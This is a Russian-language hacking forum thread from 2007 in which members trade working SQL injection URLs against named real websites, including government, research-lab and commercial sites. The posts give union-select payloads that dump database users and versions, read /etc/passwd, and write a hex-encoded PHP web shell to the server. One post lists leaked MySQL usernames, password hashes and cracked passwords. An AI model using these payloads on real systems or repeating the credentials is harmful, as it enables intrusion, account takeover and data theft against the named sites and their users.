SQL Injection

Isis · 10.06.2007, 06:57

В этой теме постим SQL-инъекции, которые вы нашли

Инъекции должны быть доведенными до ума,т.е как минимум с выводом полей.
Если дальше кавычки в инъекции ничего не будет,ваш пост будет удалятся и минус в репутацию.

Isis · 10.06.2007, 06:57

www.contagem.mg.gov.br
version, database, user

Код:

http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(concat_ws(0x3b,user(),database(),version())+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

etc/passwd

Код:

http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(LOAD_FILE(0x2f6574632f706173737764)+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

shell

Код:

http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(0x3c3f7068702073797374656d28245f4745545b636d645d293b203f3e+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user+into_outfile+/*

Isis · 10.06.2007, 07:20

www.zjda.gov.cn

Код:

http://www.zjda.gov.cn/misc.php?xname=CP0GHU0&dname=FM01G11&xpos=1'+union+select+concat_ws(0x3b,user(),database(),version())/*&op=recommend

rand0m · 15.06.2007, 09:12

gta.com.ua

Код:

http://gta.com.ua/file_sa_details.phtml?id=-24+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin/*

Neorin · 24.06.2007, 11:34

www.express-bonus.ru

Код:

http://www.express-bonus.ru/index.php?action=news&act=view&id=-1+union+select+1,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,4,%205,6+from+phpbb_users+limit+1,600/*

вот так бывает)))

Серенький · 05.07.2007, 22:22

http://downloadz.ru/

Цитата:

http://downloadz.ru/disks/detail.php...,database())/*

kair · 09.07.2007, 10:21

www.buybrand.ru

Код:

http://www.buybrand.ru/rus/index/news?id=780%20union%20select%201,2,name,4,5,passw,7,8%20from%20users/*

kair · 12.07.2007, 23:26

Код:

http://www.leform.ru/design.php?id=430%20union%20select%201,name,id,4,5,6,7,8,9%20from%20designer/*

lex · 26.07.2007, 17:44

Код:

http://dart.cshl.edu/DART/public/scripts/list_published_reports.cgi?user_id=-27+union+select+concat(user,%22:%22,password),2+from+mysql.user/*

5.0.16-standard
web_reports
ravi@dart.cshl.edu

root:7c954012190861cd
gpmuser:7b95b1692f2cc5dd
reader:57cb379d50cce781
jeremiah:47047e7757b44620
ravi:00a208111673c63b
phpacct:1c301b3a330e327c
tony:*DDF1A93EC51F6729F5F063CA291C7ABF5B682FDD

============== by limpompo ==========
reader - reader
jeremiah - ptgdb
ravi - sseleert
phpacct - suiluj
=================================

Код:

http://dart.cshl.edu/DART/public/scripts/list_published_reports.cgi?user_id=-27+union+select+load_file('/etc/passwd'),2+from+mysql.user/*

Isis · 26.07.2007, 18:52

gougle.ru

Код:

http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),database(),version()),4,5,6,7/*

Путег нашли:

Код:

/home/gougle/public_html/hotcd.php

А прав нету =)

Код:

http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),database(),version()),4,5,6,7+from+mysql.user/*